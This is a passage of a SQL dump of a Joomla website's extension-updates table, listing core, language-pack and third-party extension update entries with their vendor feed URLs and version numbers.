(1627, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1628, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1629, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1630, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1631, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1632, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1633, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1634, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1635, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1636, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1637, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1638, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1639, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1640, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1641, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1642, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1643, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1644, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1645, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1646, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1647, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1648, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1649, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1650, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1651, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1652, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1653, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1654, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1655, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1656, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1657, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1658, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1659, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1660, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', '');
INSERT INTO `y57u5_updates` (`update_id`, `update_site_id`, `extension_id`, `name`, `description`, `element`, `type`, `folder`, `client_id`, `version`, `data`, `detailsurl`, `infourl`, `extra_query`) VALUES
(1661, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1662, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1663, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1664, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1665, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1666, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1667, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1668, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1669, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1670, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1671, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1672, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1673, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1674, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1675, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1676, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1677, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1678, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1679, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1680, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1681, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1682, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1683, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1684, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1685, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1686, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1687, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1688, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1689, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1690, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1691, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1692, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1693, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1694, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1695, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1696, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1697, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1698, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1699, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1700, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1701, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1702, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1703, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1704, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1705, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1706, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1707, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1708, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1709, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1710, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1711, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1712, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1713, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1714, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1715, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1716, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1717, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1718, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1719, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1720, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1721, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1722, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1723, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1724, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1725, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1726, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1727, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1728, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1729, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1730, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1731, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1732, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1733, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1734, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1735, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1736, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1737, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1738, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1739, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1740, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1741, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1742, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1743, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1744, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1745, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
(1746, 3, 0, 'Czech', '', 'pkg_cs-CZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cs-CZ_details.xml', '', ''),
(1747, 3, 0, 'Danish', '', 'pkg_da-DK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/da-DK_details.xml', '', ''),
(1748, 3, 0, 'Dutch', '', 'pkg_nl-NL', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/nl-NL_details.xml', '', ''),
(1749, 3, 0, 'Italian', '', 'pkg_it-IT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/it-IT_details.xml', '', ''),
(1750, 3, 0, 'Lithuanian', '', 'pkg_lt-LT', 'package', '', 0, '3.9.6.1', '', 'https://update.joomla.org/language/details3/lt-LT_details.xml', '', ''),
(1751, 3, 0, 'Persian', '', 'pkg_fa-IR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fa-IR_details.xml', '', ''),
(1752, 3, 0, 'Russian', '', 'pkg_ru-RU', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/ru-RU_details.xml', '', ''),
(1753, 3, 0, 'English AU', '', 'pkg_en-AU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-AU_details.xml', '', ''),
(1754, 3, 0, 'Slovak', '', 'pkg_sk-SK', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sk-SK_details.xml', '', ''),
(1755, 3, 0, 'English US', '', 'pkg_en-US', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-US_details.xml', '', ''),
(1756, 3, 0, 'Swedish', '', 'pkg_sv-SE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sv-SE_details.xml', '', ''),
(1757, 3, 0, 'Tamil', '', 'pkg_ta-IN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ta-IN_details.xml', '', ''),
(1758, 3, 0, 'Thai', '', 'pkg_th-TH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/th-TH_details.xml', '', ''),
(1759, 3, 0, 'German DE', '', 'pkg_de-DE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-DE_details.xml', '', ''),
(1760, 3, 0, 'Portuguese Brazil', '', 'pkg_pt-BR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/pt-BR_details.xml', '', ''),
(1761, 3, 0, 'Serbian Latin', '', 'pkg_sr-YU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-YU_details.xml', '', ''),
(1762, 3, 0, 'Spanish', '', 'pkg_es-ES', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/es-ES_details.xml', '', ''),
(1763, 3, 0, 'Bosnian', '', 'pkg_bs-BA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/bs-BA_details.xml', '', ''),
(1764, 3, 0, 'Serbian Cyrillic', '', 'pkg_sr-RS', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sr-RS_details.xml', '', ''),
(1765, 3, 0, 'Finnish', '', 'pkg_fi-FI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fi-FI_details.xml', '', ''),
(1766, 3, 0, 'Swahili', '', 'pkg_sw-KE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sw-KE_details.xml', '', ''),
(1767, 3, 0, 'English CA', '', 'pkg_en-CA', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-CA_details.xml', '', ''),
(1768, 3, 0, 'Welsh', '', 'pkg_cy-GB', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/cy-GB_details.xml', '', ''),
(1769, 3, 0, 'Slovenian', '', 'pkg_sl-SI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/sl-SI_details.xml', '', ''),
(1770, 3, 0, 'Spanish CO', '', 'pkg_es-CO', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/es-CO_details.xml', '', ''),
(1771, 3, 0, 'German CH', '', 'pkg_de-CH', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-CH_details.xml', '', ''),
(1772, 3, 0, 'German AT', '', 'pkg_de-AT', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-AT_details.xml', '', ''),
(1773, 3, 0, 'German LI', '', 'pkg_de-LI', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LI_details.xml', '', ''),
(1774, 3, 0, 'German LU', '', 'pkg_de-LU', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/de-LU_details.xml', '', ''),
(1775, 3, 0, 'English NZ', '', 'pkg_en-NZ', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/en-NZ_details.xml', '', ''),
(1776, 3, 0, 'Kazakh', '', 'pkg_kk-KZ', 'package', '', 0, '3.9.8.1', '', 'https://update.joomla.org/language/details3/kk-KZ_details.xml', '', ''),
(1777, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1778, 14, 0, 'EngageBox', 'EngageBox', 'com_rstbox', 'component', '', 1, '3.5.1', '', 'https://static.tassos.gr/update/engagebox?type=.xml', 'https://www.tassos.gr/update/engagebox?view=Items&release_id=524', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1779, 17, 0, 'Convert Forms Free', 'Convert Forms Free', 'com_convertforms', 'component', '', 1, '2.4.0', '', 'https://static.tassos.gr/update/convertformsfree?type=.xml', 'https://www.tassos.gr/update/convertformsfree?view=Items&release_id=525', 'dlid=ace5ce174390a9e1bbdb8dfb5c836224'),
(1780, 18, 0, 'JCE 2.7.17', '', 'pkg_jce', 'package', '', 0, '2.7.17', '', 'https://cdn.joomlacontenteditor.net/updates/xml/editor/pkg_jce.xml', 'https://www.joomlacontenteditor.net/news/jce-pro-2-7-17-released', ''),
(1781, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1782, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1783, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1784, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1785, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1786, 1, 0, 'Joomla', '', 'joomla', 'file', '', 0, '3.9.11', '', 'https://update.joomla.org/core/sts/extension_sts.xml', '', ''),
(1787, 3, 0, 'Romanian', '', 'pkg_ro-RO', 'package', '', 0, '3.9.7.1', '', 'https://update.joomla.org/language/details3/ro-RO_details.xml', '', ''),
(1788, 3, 0, 'Flemish', '', 'pkg_nl-BE', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/nl-BE_details.xml', '', ''),
(1789, 3, 0, 'French', '', 'pkg_fr-FR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/fr-FR_details.xml', '', ''),
(1790, 3, 0, 'Georgian', '', 'pkg_ka-GE', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ka-GE_details.xml', '', ''),
(1791, 3, 0, 'Greek', '', 'pkg_el-GR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/el-GR_details.xml', '', ''),
(1792, 3, 0, 'Japanese', '', 'pkg_ja-JP', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/ja-JP_details.xml', '', ''),
(1793, 3, 0, 'Arabic Unitag', '', 'pkg_ar-AA', 'package', '', 0, '3.9.10.1', '', 'https://update.joomla.org/language/details3/ar-AA_details.xml', '', ''),
(1794, 3, 0, 'Catalan', '', 'pkg_ca-ES', 'package', '', 0, '3.9.11.2', '', 'https://update.joomla.org/language/details3/ca-ES_details.xml', '', ''),
(1795, 3, 0, 'Chinese Simplified', '', 'pkg_zh-CN', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/zh-CN_details.xml', '', ''),
(1796, 3, 0, 'Croatian', '', 'pkg_hr-HR', 'package', '', 0, '3.9.11.1', '', 'https://update.joomla.org/language/details3/hr-HR_details.xml', '', ''),
